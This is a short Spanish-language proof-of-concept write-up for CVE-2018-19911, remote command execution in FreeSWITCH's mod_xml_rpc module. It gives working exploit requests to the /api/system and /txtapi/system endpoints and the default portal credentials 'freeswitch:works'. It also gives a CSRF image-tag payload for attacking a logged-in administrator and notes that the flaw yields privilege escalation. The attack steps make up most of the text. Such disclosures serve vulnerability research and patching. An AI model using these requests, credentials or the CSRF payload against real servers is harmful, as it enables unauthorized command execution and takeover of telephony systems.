
freeswitch todas las versiones ejecución remota de comandos (cve-2018-19911)
version:<=1.8.2
módulo:mod_xml_rpc
Probé un total de tres versiones.(url de descarga:http://files.freeswitch.org/)
Instale la versión de Windows de freeswitch1.5.15(http://files.freeswitch.org/windows/installer/x64/freeswitch.msi)
Abra la consola y escriba: load mod_xml_rpc (cargar portal de freeswitch)
Acceda al puerto local 8080,
http://127.0.0.1:8080/portal/index.html
Entrada en la consola
api("system calc") orapi("bg_system calc")

También se puede solicitar la interfaz directamente
http://127.0.0.1:8080/txtapi/system?calc o
http://127.0.0.1:8080/api/system?calc



La cuenta y contraseña predeterminadas del portal de freeswitch son freeswitch:works
Puedes comprobarlo tú mismo usando freeswitch_rce.py
O usa csrf para atacar al administrador que ha iniciado sesión.
<img src="http://127.0.0.1:8080/api/system?calc">

Debido a que freeswitch a menudo se ejecuta con altos privilegios, también puede lograr el efecto de escalada de privilegios